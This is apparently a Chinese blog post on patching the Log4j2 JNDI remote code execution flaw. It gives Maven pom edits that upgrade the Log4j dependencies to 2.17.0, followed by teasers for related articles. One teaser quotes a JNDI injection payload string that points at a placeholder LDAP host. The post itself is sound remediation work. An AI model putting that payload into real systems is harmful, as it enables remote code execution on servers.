Log4j 任意代码执行漏洞,组件升级

最新推荐文章于 2024-06-15 20:55:00 发布
最新推荐文章于 2024-06-15 20:55:00 发布
阅读量274 收藏
点赞数
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xzh_java/article/details/134715689
版权

漏洞性质:任意代码执行

漏洞描述:

2021 年 12 月 9 日,该项目被曝存在 严重安全漏洞 ,攻击者只需要向目标机传入一段特殊代码,就能触发漏洞,自由地在远程执行任意代码来控制目标机器!

Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。log4j2是全球使用广泛的java日志框架,同时该漏洞还影响很多全球使用量的Top序列的通用开源组件,例如 Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。

漏洞危害:

Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据被日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码,可能对用户造成不可挽回的损失。

危害等级:严重

 

解决方案:升级平台所有依赖组件版本号,org.apache.logging.log4j 2.17.0,

目前平台springboot版本号为 2.2.0,依赖的日志组件版本为 2.12.1需要升级,官方修复补丁在2.15以上版本。本次升级到2.17.0最新版本。

1.检查项目的maven对应的组件

2.依次修改各war包工程中的pom文件引用,单独引用log4j组件

				<dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
            <exclusions>
                <exclusion>
                    <groupId>org.springframework.boot</groupId>
                    <artifactId>spring-boot-starter-tomcat</artifactId>
                </exclusion>
                <!-- statr log4j 独立引用升级 add by soldier on 20121231-->
                <exclusion>
                    <groupId>org.apache.logging.log4j</groupId>
                    <artifactId>log4j-to-slf4j</artifactId>
                </exclusion>
                <!-- end log4j 独立引用升级 add by soldier on 20121231-->
            </exclusions>
        </dependency>
        <!--start log4j 包管理Apache Log4j任意代码执行漏洞 20211231-->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-to-slf4j</artifactId>
            <version>2.17.0</version>
            <exclusions>
                <exclusion>
                    <groupId>org.apache.logging.log4j</groupId>
                    <artifactId>log4j-api</artifactId>
                </exclusion>
            </exclusions>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.17.0</version>
        </dependency>
        <!-- end log4j 包管理Apache Log4j任意代码执行漏洞 20211231-->
3.修改rs-parent主工程对应的pom文件,排除日志依赖的引用

            <exclusions>
                <exclusion>
                    <groupId>org.apache.logging.log4j</groupId>
                    <artifactId>log4j-to-slf4j</artifactId>
                </exclusion>
            </exclusions>
4.如有工作流模组,需要对应修改工作流

						<exclusions>
                <exclusion>
                    <groupId>org.apache.logging.log4j</groupId>
                    <artifactId>log4j-slf4j-impl</artifactId>
                </exclusion>
                <exclusion>
                    <groupId>org.apache.logging.log4j</groupId>
                    <artifactId>log4j-api</artifactId>
                </exclusion>
            </exclusions>


            <!-- statr log4j 独立引用升级 add by soldier on 20121231-->
            <exclusions>
                <exclusion>
                    <groupId>org.springframework.boot</groupId>
                    <artifactId>spring-boot-starter-log4j2</artifactId>
                </exclusion>
            </exclusions>
            <!-- end log4j 独立引用升级 add by soldier on 20121231-->
5.再次检查整个工程的maven依赖,确认升级成功

确保log4j的版本号已经为最新的2.17.0引用。

一个小哑巴
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
分析Apache Log4j2 远程代码执行漏洞_log4j2漏洞2,2024年最新网络安全性能优化最佳实践
2401_83739777的博客
04-16 1305
Log4j是Apache的一个开源项目,通过使用Log4j,可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;Apache Log4j2是 Log4j的升级版本,据分析,该漏洞产生的原因在于Log4j在记录日志的过程中会对日志内容进行判断,如果内容中包含了${,则Log4j会认为此字符属于可替换的变量,并且Log4j支持JNDI远程加载的方式替换变量值。
解决Apache Log4j版本漏洞(版本升级
qq_45752401的博客
12-14 4643
近日,Apache Log4j2 的远程代码执行漏洞刷爆网络,该漏洞一旦被攻击者利用会造成严重危害。而且此次漏洞影响巨大,Apache Log4j2可是全民级的日志组件,百分之九十的项目,都是通过log4j2输出日志的,甚至BAT大厂也是如此,很多互联网企业也都连夜做了应急措施 本次以IDEA为例 1,在idea右侧找maven,如果没有,可以点击最上方的菜单栏的view -->Tool Windows --> maven ...
又被漏洞追着跑?log4j2升级到 2.23.1 操作流程
最新发布
Javajdkbz的博客
06-15 373
Java 用第三方开源包,免不了被漏洞追着跑,几乎每年都要对最新爆出的漏洞组件进行升级,今年要升级的是 log4j2 和 nacos,升级到最新版本。额外补充一下我在将某项目从 log4j 升级log4j2 的过程中碰到的一个小问题,log4j.properties 中引用环境变量的方法是。门面包版本包不匹配时,日志直接被忽略了,别问我怎么知道的,这是我画蛇添足把这个包升级到 2.0.5 后得出的教训。,但是对于 log4j2.xml 配置文件中,这个方式不生效了,而是用 ${sys:系统变量}
CVE-2021-44228 Log4j2漏洞复现
Cover-3321的博客
01-07 1863
apache log4j: 是java语言中的日志处理套件/程序。2.0-2.14.1存在JNDI注入漏洞,导致攻击者可以控制日志内容的情况下,传入${jndi:ldap://xxxxxx.com/rce}的参数进行JNDI注入,执行远程命令。
log4j2原理分析及漏洞复现
HUANGXIN9898的博客
10-23 871
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶意请求,触发远程代码执行漏洞,从而获得目标服务器权限。在java中最常用的日志框架是log4j2和logback,其中log4j2支持。
log4j升级log4j2,log4j2+slf4j+commons-logging+Jboss-logging(SSH项目)
github_39060174的博客
09-24 1877
Java日志 - log4j1升级log4j2,涉及commons-logging、slf4j、Jboss-logging日志组件(SSH项目) 1 前言 1. 1 问题起因 SSH框架中已集成log4j,采用log4j.preoerties配置文件的方式进行日志记录。因升级log4j2导致spring相关日志输出、单元测试运行报错等情况。因此梳理了SSH框架中涉及到的日志工具:log4j1、log4j2、commons-logging、slf4j、jboss-logging 之间的关系,以及升级中如何
log4j JNDI漏洞CVE-2021-44228 针对于不同版本的解决方案
smlie_shuihan的博客
12-12 4540
问题描述: Apache Log4j 2存在远程代码执行漏洞,攻击者可通过构造恶意请求利用该漏洞实现在目标服务器上执行任意代码 漏洞影响版本:2.0 <= Apache Log4j 2 <= log4j-2.15.0-rc1 看一下目前log4j的maven官方仓库版本,几乎是主流常用版本都受影响 解决方案: 试了一下网上几种方案,绝大部分都是解决 >=2.10 版本的方案 : 1、第一种方案,更新log4j版本 https://github.com/apache/logging-log
log4j-2.18.0
08-04
这个漏洞,通常被称为“Log4Shell”,因其潜在的危害性被业界高度重视,可能允许攻击者远程执行任意代码,从而对网络系统造成极大的破坏。 首先,我们需要理解什么是log4j。Log4j是Apache软件基金会的一个开源项目...
若依框架使用的log4j2.16.0,修复log4j漏洞log4j2下载最新log4j2.16.0下载
12-16
Log4j2.16.0是官方发布的一个重要安全补丁,它包含了一系列的安全增强措施,以防止恶意输入触发远程代码执行。对于使用Log4j2的若依框架或者其他任何依赖Log4j2的项目,升级到2.16.0或更高版本是至关重要的,因为不...
log4j漏洞排查小工具
12-20
Log4j漏洞Log4Shell)是一个远程代码执行(RCE)漏洞,它允许攻击者通过精心构造的输入来执行任意代码,从而完全控制受感染的系统。由于Log4j在许多Java应用程序中的普遍使用,该漏洞影响了全球大量的服务器和设备...
log4j2漏洞检测工具
05-07
然而,在2021年12月初,研究人员发现Log4j2的一个严重漏洞,允许攻击者通过注入JNDI(Java Naming and Directory Interface)链接来执行任意代码。由于Log4j2被广泛应用在各种软件和系统中,这个漏洞的影响范围非常...
log4j-2.15.0-rc2.zip
12-11
Log4j 2.15.0-rc2:修复JNDI注入漏洞的紧急更新》 在网络安全领域,漏洞的发现与修复是至关重要的环节。此次我们关注的是一个针对Java日志库Log4j的重大安全问题,即著名的“Log4Shell”漏洞。这个漏洞(CVE-2021...
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
weixin_44047654的博客
12-12 723
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
「Java工具类」BeanCopyUtil对象复制工具类
热门推荐
Java Farmer
10-31 1万+
介绍语 本号主要是Java常用关键技术点,通用工具类的分享;以及springboot+springcloud+Mybatisplus+druid+mysql+redis+swagger+maven+docker等集成框架的技术分享;datax、kafka、flink等大数据处理框架的技术分享。文章会不断更新,欢迎码友关注点赞收藏转发! 望各位码友点击关注,冲1000粉。后面会录制一些视频教程,图文和视频结合,比如:图书介绍网站系统、抢购系统、大数据中台系统等。技术才是程序猿的最爱,码友们冲啊 如果码友
严重危害警告!Log4j 执行漏洞被公开!
m0_59598029的博客
02-21 169
12 月 10 日凌晨,Apache 开源项目 Log4j2 的远程代码执行漏洞细节被公开,漏洞威胁等级为:严重。Log4j2 是一个基于 Java 的日志记录工具。它重写了 Log4j 框架,引入了大量丰富特性,让用户可以控制日志信息输送的目的地为控制台、文件、GUI 组件等。同时通过定义每一条日志信息的级别,让使用者能够更加细致地控制日志的生成过程。Log4j 是目前全球使用最广泛的 java 日志框架之一。
Apache Log4j任意代码执行漏洞安全风险通告第三次更新
smellycat000的专栏
12-10 4449
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。风险通告近日,奇安信CERT监测到Apache Log4j存在任意代码执行漏洞。经过分析,该组件存在Java JND...
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
weixin_50341025的博客
04-23 2613
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码漏洞环境 执行如下命令启动漏洞环境 docker-compose up -d 环境启动后,将在4712端口开启一个TCPServer。 说一下,除了使用vulhub的docker镜像搭建环境外,我们下载了log4j的jar文件后可以直接在命令行启动这个TCPServer:java -cp "log4j-api-2.8.1.j
log4j2漏洞升级
magic_kid_2010的专栏
12-17 7065
一、影响范围: Apache Log4j 2.x <= 2.15.0-rc1 二、可能受影响的应用不限于以下内容: Spring-Boot-strater-log4j2 Apache Struts2 Apache Solr Apache Druid Apache Flink ElasticSearch Flume Dubbo Jedis Logstash Kafka Apache Storm 三、解决办法: 1、等待官方升级 log4j2 版本。 2、自己升级 log
log4j远程代码执行漏洞
06-01
log4j远程代码执行漏洞是一种安全漏洞,可以允许攻击者远程执行恶意代码。该漏洞影响Apache软件基金会的Java日志库Log4j 2.x版本,并由于其被广泛使用而引起了广泛的关注。 攻击者可以通过精心构造的日志消息来触发该漏洞,从而远程执行任意代码。该漏洞已被评为最高危险性的漏洞之一,并在全球范围内引起了广泛的警惕。 如果您正在使用Log4j 2.x版本,请及时更新到最新版本,并考虑禁用JNDI查找以帮助保护您的系统免受此漏洞的影响。同时,您也可以使用其他Java日志库来替代Log4j,以降低系统受攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值